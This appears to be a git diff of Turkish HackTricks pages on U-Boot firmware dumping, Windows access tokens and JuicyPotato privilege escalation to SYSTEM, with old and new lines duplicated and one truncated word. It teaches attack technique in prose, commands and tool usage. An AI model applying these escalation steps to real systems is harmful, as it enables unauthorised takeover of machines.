Bunu yapmanın birçok yolu vardır ve SPI bölümü, çeşitli cihazlarla EEPROM'dan firmware'in doğrudan çıkarılma yöntemlerini kapsar. Bununla birlikte, fiziksel cihazlar ve harici etkileşimlerle firmware'in dump edilmesini ilk denemeden önce UART ile yapmayı önerilir.
UART Konsolundan firmware dump etmek, öncelikle bootloader'lara erişim sağlamayı gerektirir. Birçok popüler satıcı, Linux'u yüklemek için <b>uboot</b> (Universal Bootloader) kullanır. Bu nedenle, <b>uboot</b>'a erişim sağlamak gereklidir.
<b>Boot</b> bootloader'ına erişmek için UART portunu bilgisayara bağlayın ve herhangi bir Seri Konsol aracını kullanın ve cihazın güç kaynağını bağlı olmaktan çıkarın. Kurulum hazır olduğunda Enter tuşuna basılı tutun. Son olarak, cihazın güç kaynağını bağlayın ve başlatın.
<b>Boot</b> bootloader'a erişmek için UART portunu bilgisayara bağlayın ve herhangi bir Seri Konsol aracını kullanın ve cihazın güç kaynağını bağlı olmaktan çıkarın. Kurulum hazır olduğunda Enter tuşuna basılı tutun. Son olarak, cihazın güç kaynağını bağlayın ve başlatın.
Bunu yapmak, <b>uboot</b>'un yüklenmesini kesintiye uğratacak ve bir menü sağlayacaktır. <b>uboot</b> komutlarını anlamak ve bunları listelemek için yardım menüsünü kullanmanız önerilir. Bu muhtemelen `help` komutudur. Farklı satıcılar farklı yapılandırmaları kullandıklarından, her birini ayrı ayrı anlamak gereklidir.
@ -181,18 +195,32 @@ binwalk -e <filename.rom>
```
Bu, EEPROM'daki olası içerikleri, hex dosyasında bulunan imzalara göre listeleyecektir.
Ancak, kullanılsa bile <b>uboot</b>'un her zaman kilidinin açık olmadığını belirtmek gerekir. Enter tuşu bir şey yapmıyorsa, Boşluk Tuşu gibi farklı tuşları kontrol edin. Önyükleyicinin kilitli olup kesintiye uğramadığı durumlarda bu yöntem işe yaramaz. Cihaz için <b>uboot</b>'un önyükleyici olup olmadığını kontrol etmek için, cihazın önyükleme sırasında UART Konsolu çıktısını kontrol edin. Önyükleme sırasında <b>uboot</b> bahsediliyorsa, bu yöntem işe yarayabilir.
Ancak, kullanılsa bile <b>uboot</b>'un her zaman kilidinin açık olmadığını belirtmek gerekir. Enter tuşu bir şey yapmıyorsa, Boşluk Tuşu gibi farklı tuşları kontrol edin. Önyükleyicinin kilitli olup kesintiye uğramadığı durumlarda bu yöntem çalışmayabilir. Cihaz için <b>uboot</b>'un önyükleyici olup olmadığını kontrol etmek için, cihazın önyükleme sırasında UART Konsolundaki çıktıyı kontrol edin. Önyükleme sırasında <b>uboot</b> ifadesinin geçtiğini görebilirsiniz.
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için ücretsiz işlevler sunan **karanlık ağ** destekli bir arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizin HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da takip edin.**
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -4,17 +4,31 @@
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
* **Bir siber güvenlik şirketinde mi çalışıyorsunuz**? **Şirketinizi HackTricks'te reklam görmek ister misiniz**? ya da **PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz**? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Bir siber güvenlik şirketinde mi çalışıyorsunuz? Şirketinizin HackTricks'te reklamını görmek ister misiniz? ya da PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz? [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* **Katılın** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) ya da [**telegram grubuna**](https://t.me/peass) veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**'ı takip edin**.
* **Hacking püf noktalarınızı göndererek PR'ler aracılığıyla paylaşın** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya beni **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**'da takip edin.**
* **Hacking püf noktalarınızı göndererek PR'ler oluşturarak** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **paylaşın.**
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Erişim Jetonları
**Sisteme giriş yapan her kullanıcı**, o oturum için **güvenlik bilgileri içeren bir erişim jetonuna sahiptir**. Sistem, kullanıcı oturum açtığında bir erişim jetonu oluşturur. **Kullanıcı adına yürütülen her işlem**, erişim jetonunun bir kopyasına sahiptir. Jeton, kullanıcıyı, kullanıcının gruplarını ve kullanıcının ayrıcalıklarını tanımlar. Bir jeton ayrıca, mevcut oturumu tanımlayan bir oturum açma SID'si (Güvenlik Tanımlayıcısı) içerir.
**Sisteme giriş yapan her kullanıcı**, o oturum için güvenlik bilgileri içeren bir erişim jetonuna sahiptir. Kullanıcı oturum açtığında sistem bir erişim jetonu oluşturur. **Kullanıcı adına yürütülen her işlem**, erişim jetonunun bir kopyasına sahiptir. Jeton, kullanıcıyı, kullanıcının gruplarını ve kullanıcının ayrıcalıklarını tanımlar. Bir jeton ayrıca, mevcut oturumu tanımlayan bir oturum açma SID'si (Güvenlik Kimliği) içerir.
Bu bilgileri `whoami /all` komutunu çalıştırarak görebilirsiniz.
```
@ -65,7 +79,7 @@ SeTimeZonePrivilege Change the time zone Disabled
Bir yerel yönetici oturum açtığında, **iki erişim belirteci oluşturulur**: Bir tanesi yönetici haklarına sahipken diğeri normal haklara sahiptir. **Varsayılan olarak**, bu kullanıcı bir işlemi yürüttüğünde **normal** (yönetici olmayan) **haklara sahip olan kullanılır**. Bu kullanıcı bir şeyi **yönetici olarak yürütmeye çalıştığında** ("Yönetici olarak çalıştır" örneğin) **UAC** izni için sorulacaktır.\
Eğer [**UAC hakkında daha fazla bilgi edinmek istiyorsanız bu sayfayı okuyun**](../authentication-credentials-uac-and-efs/#uac)**.**
### Kimlik kullanıcı taklit etme
### Kimlik kullanıcı taklidi
Eğer **başka bir kullanıcının geçerli kimlik bilgilerine sahipseniz**, bu kimlik bilgileriyle bir **yeni oturum açma oturumu oluşturabilirsiniz**:
```
@ -76,18 +90,18 @@ Ağ hizmetlerine erişmek için **farklı kimlik bilgileri kullanan bir işlem b
```
runas /user:domain\username /netonly cmd.exe
```
Bu, ağdaki nesnelere erişmek için kullanışlı kimlik bilgileriniz varsa ancak bu kimlik bilgileri geçerli ana makinede kullanılmıyorsa (çünkü yalnızca ağda kullanılacaklar), kullanışlıdır (mevcut ana makinede mevcut kullanıcı ayrıcalıkları kullanılacaktır).
Bu, ağdaki nesnelere erişmek için kullanışlı kimlik bilgileriniz varsa ancak bu kimlik bilgileri geçerli ana makinede geçerli değilse (çünkü yalnızca ağda kullanılacaklar), kullanışlıdır (mevcut ana makinede mevcut kullanıcı ayrıcalıkları kullanılacaktır).
### Kimlik Bilgilerinin Türleri
Mevcut iki tür kimlik bilgisi vardır:
* **Birincil Kimlik Bilgisi**: Bir işlemin güvenlik kimlik bilgilerinin bir temsili olarak hizmet eder. Birincil kimlik bilgisinin oluşturulması ve işlemlerle ilişkilendirilmesi, ayrıcalık ayrımı ilkesini vurgulayan yükseltilmiş ayrıcalıklar gerektiren eylemlerdir. Genellikle, kimlik doğrulama hizmeti kimlik bilgisi oluştururken, oturum açma hizmeti kullanıcının işletim sistemi kabuğuyla ilişkilendirir. İşlemlerin oluşturulduğunda, işlemler ebeveyn işleminin birincil kimlik bilgisini miras alırlar.
* **Birincil Kimlik Bilgisi**: Bir işlemin güvenlik kimlik bilgilerinin bir temsili olarak hizmet eder. Birincil kimlik bilgisinin oluşturulması ve işlemlerle ilişkilendirilmesi, ayrıcalık ayrımı ilkesini vurgulayan yükseltilmiş ayrıcalıklar gerektiren eylemlerdir. Genellikle, bir kimlik doğrulama servisi kimlik bilgisi oluştururken, bir oturum açma servisi kullanıcının işletim sistemi kabuğuyla ilişkilendirir. İşlemlerin oluşturulduğunda, işlemler ebeveyn işleminin birincil kimlik bilgisini devralırlar.
* **Taklit Kimlik Bilgisi**: Bir sunucu uygulamasının geçici olarak güvenli nesnelere erişmek için istemcinin kimliğini benimsemesine olanak tanır. Bu mekanizma dört seviyede işler:
* **Anonim**: Sunucuya kimliği belirsiz bir kullanıcı gibi erişim sağlar.
* **Tanımlama**: Sunucunun nesne erişimi için kullanmadan istemcinin kimliğini doğrulamasına izin verir.
* **Tanımlama**: Sunucunun nesnelere erişim için kullanmadan istemcinin kimliğini doğrulamasına izin verir.
* **Taklit**: Sunucunun istemcinin kimliği altında çalışmasını sağlar.
* **Delege**: Taklit ile benzerdir ancak bu kimlik varsayımını sunucunun etkileşimde bulunduğu uzak sistemlere genişletme yeteneğini içerir, kimlik korumasını sağlar.
* **Delege**: Taklit ile benzerdir ancak sunucunun etkileşimde bulunduğu uzak sistemlere bu kimlik varsayımını genişletme yeteneğini içerir, kimlik bilgisinin korunmasını sağlar.
#### Kimlik Bilgilerini Taklit Etme
@ -101,8 +115,33 @@ Metasploit'in _**incognito**_ modülünü kullanarak yeterli ayrıcalıklara sah
[privilege-escalation-abusing-tokens.md](privilege-escalation-abusing-tokens.md)
{% endcontent-ref %}
[**Tüm olası kimlik bilgisi ayrıcalıklarına ve bazı tanımlamalara bu harici sayfada göz atın**](https://github.com/gtworek/Priv2Admin).
[**Tüm olası kimlik bilgisi ayrıcalıklarını ve bazı tanımlamaları bu harici sayfada inceleyin**](https://github.com/gtworek/Priv2Admin).
## Referanslar
Bu öğreticilerde kimlik bilgileri hakkında daha fazla bilgi edinin: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) ve [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunar.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme hakkında bilgi edinin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* **Bir ** **cybersecurity şirketinde mi çalışıyorsunuz? Şirketinizi HackTricks'te görmek ister misiniz? veya PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**The PEASS Ailesi**](https://opensea.io/collection/the-peass-family)'ni keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* **[💬](https://emojipedia.org/speech-balloon/) Discord grubuna** katılın veya [telegram grubuna](https://t.me/peass) katılın veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**'u takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks repo**'suna ve **hacktricks-cloud repo**'ya PR'lar göndererek paylaşın.
</details>

View file

@ -2,18 +2,32 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin!</summary>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
* **Bir siber güvenlik şirketinde mi çalışıyorsunuz? Şirketinizin HackTricks'te reklamını görmek ister misiniz? Ya da PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz?** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'nı kontrol edin!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
* [**Resmi PEASS & HackTricks ürünleri**](https://peass.creator-spring.com)'ni edinin
* **💬** [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**'u takip edin.**
* **Bir **cybersecurity şirketinde mi çalışıyorsunuz? Şirketinizin **HackTricks'te reklamını görmek** ister misiniz? ya da **PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* **Katılın** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**'ı takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks ve hacktricks-cloud depolarına PR göndererek paylaşın.**
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar tarafından tehlikeye atılıp atılmadığını kontrol etmek için ücretsiz işlevler sunar**.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
{% hint style="warning" %}
**JuicyPotato**, Windows Server 2019 ve Windows 10 sürümü 1809'dan sonrasında çalışmamaktadır. Ancak, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) aynı ayrıcalıkları kullanmak ve `NT AUTHORITY\SYSTEM` seviyesine erişmek için kullanılabilir. _**Kontrol edin:**_
**JuicyPotato**, Windows Server 2019 ve Windows 10 sürümü 1809'dan sonrasında çalışmaz. Ancak, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) aynı ayrıcalıkları kullanmak ve `NT AUTHORITY\SYSTEM` seviyesine erişmek için kullanılabilir. _**Kontrol edin:**_
{% endhint %}
{% content-ref url="roguepotato-and-printspoofer.md" %}
@ -22,27 +36,27 @@
## Juicy Potato (altın ayrıcalıklarını kötüye kullanma) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
_Biraz meyve suyu eklenmiş_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_'un şekerlenmiş versiyonu, yani **Windows Hizmet Hesaplarından NT AUTHORITY\SYSTEM'a** kadar başka bir Yerel Ayrıcalık Yükseltme aracı_
_Biraz meyve suyu eklenmiş_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_'nun şekerlenmiş versiyonu, yani **Windows Hizmet Hesaplarından NT AUTHORITY\SYSTEM'e başka bir Yerel Ayrıcalık Yükseltme aracı**_
#### Juicypotato'yu [buradan indirebilirsiniz](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
#### Juicypotato'yı [buradan indirebilirsiniz](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
### Özet <a href="#summary" id="summary"></a>
[**Juicy-potato Readme'den**](https://github.com/ohpe/juicy-potato/blob/master/README.md)** alınmıştır:**
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) ve [varyantları](https://github.com/decoder-it/lonelypotato), [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [hizmetine](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) dayalı ayrıcalık yükseltme zincirini kullanan MiTM dinleyicisi olan `127.0.0.1:6666` üzerinde ve `SeImpersonate` veya `SeAssignPrimaryToken` ayrıcalıklarına sahip olduğunuzda çalışır. Bir Windows derlemesi incelemesi sırasında, `BITS`'in kasıtlı olarak devre dışı bırakıldığı ve port `6666`'nın alındığı bir yapı bulduk.
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) ve [varyantları](https://github.com/decoder-it/lonelypotato) [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [servisine](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) dayalı ayrıcalık yükseltme zincirini kullanan ve `127.0.0.1:6666` üzerinde MiTM dinleyicisi olan ve `SeImpersonate` veya `SeAssignPrimaryToken` ayrıcalıklarına sahip olduğunuzda çalışan bir araçtır. Bir Windows derlemesi incelemesi sırasında, `BITS`'in kasıtlı olarak devre dışı bırakıldığı ve port `6666`'nın alındığı bir yapı bulduk.
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)'yi silahlandırmaya karar verdik: **Juicy Potato'ya hoş geldiniz.**
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) silahlandırmaya karar verdik: **Juicy Potato'ya hoş geldiniz**.
> Teori için [Rotten Potato - Hizmet Hesaplarından SYSTEM'e Ayrıcalık Yükseltme](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) makalesine bakın ve bağlantılar ve referanslar zincirini takip edin.
> Teori için [Rotten Potato - Hizmet Hesaplarından SYSTEM'e Ayrıcalık Yükseltme](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) makalesine bakın ve bağlantıları ve referansları takip edin.
`BITS` dışında, kullanabileceğimiz birkaç COM sunucusu olduğunu keşfettik. Bunlar sadece:
`BITS` dışında, kötüye kullanabileceğimiz birkaç COM sunucusu olduğunu keşfettik. Sadece:
1. mevcut kullanıcı tarafından anında oluşturulabilir, genellikle sahtecilik ayrıcalıklarına sahip olan "hizmet kullanıcısı"
1. mevcut kullanıcı tarafından anında oluşturulabilir olmaları gerekir, genellikle bir "hizmet kullanıcısı" olup kimlik hırsızlığı ayrıcalıklarına sahiptir
2. `IMarshal` arabirimini uygulamak
3. yükseltilmiş bir kullanıcı olarak çalıştırılmalıdır (SYSTEM, Yönetici, …)
Birkaç testten sonra, çeşitli Windows sürümlerinde [ilginç CLSID'lerin](http://ohpe.it/juicy-potato/CLSID/) kapsamlı bir listesini elde ettik ve test ettik.
Birkaç Windows sürümünde [ilginç CLSID'lerin](http://ohpe.it/juicy-potato/CLSID/) kapsamlı bir listesini elde ettik ve test ettik.
### Detaylar <a href="#juicy-details" id="juicy-details"></a>
@ -51,15 +65,16 @@ JuicyPotato size şunları yapmanızı sağlar:
* **Hedef CLSID** _istediğiniz herhangi bir CLSID'yi seçin._ [_Buradan_](http://ohpe.it/juicy-potato/CLSID/) _işletim sistemine göre düzenlenmiş listeyi bulabilirsiniz._
* **COM Dinleme portu** _sabitlenmiş 6666 yerine tercih ettiğiniz COM dinleme portunu tanımlayın_
* **COM Dinleme IP adresi** _sunucuyu herhangi bir IP'ye bağlayın_
* **İşlem oluşturma modu** _sahtecilik yapan kullanıcının ayrıcalıklarına bağlı olarak şunlardan seçebilirsiniz:_
* `CreateProcessWithToken` ( `SeImpersonate` gerektirir)
* **İşlem oluşturma modu** _kimlik hırsızlığı yapan kullanıcının ayrıcalıklarına bağlı olarak seçebileceğiniz:_
* `CreateProcessWithToken` (`SeImpersonate` gerektirir)
* `CreateProcessAsUser` (`SeAssignPrimaryToken` gerektirir)
* `her ikisi`
* **Başlatılacak işlem** _saldırı başarılı olursa bir yürütülebilir dosya veya betik başlatın_
* **İşlem Argümanı** _başlatılan işlem argümanlarını özelleştirin_
* **RPC Sunucu adresi** _gizli bir yaklaşım için harici bir RPC sunucusuna kimlik doğrulayabilirsiniz_
* **RPC Sunucu portu** _eğer harici bir sunucuya kimlik doğrulamak istiyorsanız ve güvenlik duvarı port `135`'i engelliyorsa faydalı olabilir…_
* **TEST modu** _genellikle test amaçlıdır, yani CLSID'leri test etmek için. DCOM oluşturur ve token kullanıcısını yazdırır. Test için_ [_buraya bakın_](http://ohpe.it/juicy-potato/Test/)
* **RPC Sunucu portu** _eğer bir güvenlik duvarı port `135`'i engelliyorsa harici bir sunucuya kimlik doğrulamak istiyorsanız faydalı olabilir…_
* **TEST modu** _genellikle test amaçlıdır, yani CLSID'leri test etmek için. DCOM oluşturur ve token kullanıcısını yazdırır. Test etmek için_ [_buraya bakın_](http://ohpe.it/juicy-potato/Test/)
### Kullanım <a href="#kullanım" id="kullanım"></a>
```
T:\>JuicyPotato.exe
JuicyPotato v0.1
@ -80,11 +95,11 @@ Optional args:
[**Juicy Potato Readme'den**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)**:**
Eğer kullanıcı `SeImpersonate` veya `SeAssignPrimaryToken` ayrıcalıklarına sahipse, o zaman **SYSTEM** olursunuz.
Kullanıcıda `SeImpersonate` veya `SeAssignPrimaryToken` ayrıcalıkları varsa, o zaman **SYSTEM**'dır.
Tüm bu COM Sunucularının kötüye kullanımını engellemek neredeyse imkansızdır. Bu nesnelerin izinlerini `DCOMCNFG` aracılığıyla değiştirmeyi düşünebilirsiniz ancak başarılar, bu oldukça zor olacaktır.
Tüm bu COM Sunucularının kötüye kullanımını engellemek neredeyse imkansızdır. Bu nesnelerin izinlerini `DCOMCNFG` aracılığıyla değiştirmeyi düşünebilirsiniz ama başarılar, bu zor olacak.
Gerçek çözüm, `* SERVICE` hesapları altında çalışan hassas hesapları ve uygulamaları korumaktır. `DCOM`'u durdurmak kesinlikle bu saldırıyı engelleyecektir ancak altta yatan işletim sistemi üzerinde ciddi bir etkisi olabilir.
Gerçek çözüm, `* SERVICE` hesapları altında çalışan hassas hesapları ve uygulamaları korumaktır. `DCOM`'u durdurmak kesinlikle bu ığı engeller ancak altta yatan işletim sistemine ciddi bir etkisi olabilir.
Kaynak: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
@ -115,7 +130,7 @@ c:\Users\Public>
## CLSID Sorunları
Genellikle, JuicyPotato'nun kullandığı varsayılan CLSID **çalışmaz** ve güvenlik açığı başarısız olur. Genellikle, **çalışan bir CLSID** bulmak için birden fazla deneme yapmak gerekir. Belirli bir işletim sistemi için denemek için bir CLSID listesi almak için şu sayfayı ziyaret etmelisiniz:
Genellikle, JuicyPotato'nun varsayılan CLSID'si **çalışmaz** ve güvenlik açığı başarısız olur. Genellikle, **çalışan bir CLSID** bulmak için birden fazla deneme yapmak gerekir. Belirli bir işletim sistemi için denemek için bir CLSID listesi almak için şu sayfayı ziyaret etmelisiniz:
{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
@ -123,9 +138,9 @@ Genellikle, JuicyPotato'nun kullandığı varsayılan CLSID **çalışmaz** ve g
İlk olarak, juicypotato.exe dışında bazı yürütülebilir dosyalara ihtiyacınız olacak.
[Join-Object.ps1'yi](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) indirin ve PS oturumunuza yükleyin, ve [GetCLSID.ps1'i](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1) indirin ve yürütün. Bu betik, test etmek için olası CLSID'lerin bir listesini oluşturacaktır.
[Join-Object.ps1'yi](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) indirin ve PS oturumunuza yükleyin, ardından [GetCLSID.ps1'i](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1) indirin ve çalıştırın. Bu betik, test etmek için olası CLSID'lerin bir listesini oluşturacaktır.
Ardından [test\_clsid.bat'ı indirin](https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat) (CLSID listesi ve juicypotato yürütülebilir dosyasının yolunu değiştirin) ve yürütün. Her CLSID'yi denemeye başlayacak ve **port numarası değiştiğinde, bu CLSID'nin çalıştığı anlamına gelecektir**.
Daha sonra [test\_clsid.bat'ı indirin](https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat) (CLSID listesi ve juicypotato yürütülebilir dosyasının yolunu değiştirin) ve çalıştırın. Her CLSID'yi denemeye başlayacak ve **port numarası değiştiğinde, bu CLSID'in çalıştığı anlamına gelecektir**.
**Çalışan CLSID'leri** -c parametresini kullanarak **kontrol edin**
@ -133,14 +148,26 @@ Ardından [test\_clsid.bat'ı indirin](https://github.com/ohpe/juicy-potato/blob
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için ücretsiz işlevsellikler sunan **dark-web** destekli bir arama motorudur.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
